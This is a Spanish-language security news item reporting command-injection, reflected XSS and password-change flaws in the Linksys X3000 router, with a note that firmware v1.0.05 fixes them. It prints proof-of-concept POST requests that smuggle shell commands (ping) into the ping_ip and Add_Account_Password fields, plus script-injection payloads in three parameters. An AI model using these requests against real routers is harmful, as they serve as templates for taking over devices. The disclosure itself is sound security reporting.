Han descubierto varios fallos de seguridad en el modelo X3000 de router WiFi de la marca Linksys de Cisco. Estas vulnerabilidades permiten la ejecución de código remoto a través de la inyección de comandos en el sistema operativo …

  … subyacente, cross-site scripting y posibilidad de cambiar la contraseña sin preguntar por la contraseña actual. 

Inyección de comandos 
 
Se aprovecha la falta de validación en el contenido suministrado por el usuario en los campos ping_ip y Add_Account_Password.

Las siguientes peticiones POST pueden servir como prueba de concepto: 

 
* Parámetro ping_ip de la página Diagnostics.asp: 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=%3b%20ping%20-c%201%20192%2e168%2e1%2e147%20%3b&ping_size=&ping_times=5&traceroute_ip=
 
* Parámetro Add_Account_Password de la página User_Properties.asp: 
command=device_data&cur_ipaddr=192.168.178.188&next_page=StorageAdminUserAdd1.htm&redirect_timer=1&reboot=0&data1=&next_page=&submit_button=User_Properties&submit_type=create_user&change_action=gozila_cgi&Add_Account_Group_Name=&access_group_name=&delete_groups=&Modify_Account_Name=&Add_Account_Name=pwnd&full_name=pwnd&user_desc=pwnd&Add_Account_Password=`ping%20192%2e168%2e178%2e103`&Add_Account_PasswordConfirm=pwnd&Add_Account_Group=admin
 
Con estas peticiones conseguimos ejecutar en el sistema el comando ping. 
 

XSS no persistente 
 
También falta de validación en los parámetros ping_ip, sortby y submit_button. 
 
* Parámetro ping_ip de la página Diagnostics.asp: 
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&nowait=1&ping_ip=1.1.1.1′><script>alert(1)</script>&ping_size=32&ping_times=5&traceroute_ip=
 
* Parámetro sortby de la página DHCPTable.asp: 
submit_button=DHCPTable&change_action=&submit_type=&small_screen=&ip=&mac=&if_name=&nowait=1&sortby=mac"%3balert(1)//
 
* Parámetro submit_button de la página WanMAC.asp: 
submit_button=WanMAC’%3balert(1)//&change_action=&submit_type=&action=Apply&wait_time=3&mac_clone_enable=0
 
Estas vulnerabilidades han sido solucionas en el firmware v1.0.05 build 002 Feb 21,2013 
 
Opina sobre esta noticia: 
http://unaaldia.hispasec.com/2013/06/multiples-vulnerabilidades-en-router..html#comments
 
Más información:
 
Linksys X3000 – Multiple Vulnerabilities
http://www.s3cur1ty.de/m1adv2013-019
 
Wireless-N ADSL 2+ Modem Router (X3000)
http://support.linksys.com/en-eu/support/linksys/X3000

Fuente:
Fernando Castillo
fcastillo@hispasec.com
Laboratorio Hispasec
www.hispasec.com

Imagen:
Fotos Digitales Gratis
www.fotosdigitalesgratis.com

Logotipos/Imágenes/Texto MR Respectiva/s Compañía/s mencionada/s en la noticia.
Portal de Seguridad Informática, Tecnología e Internet
Descargas Antivirus/Antimalware
www.antivirusgratis.com.ar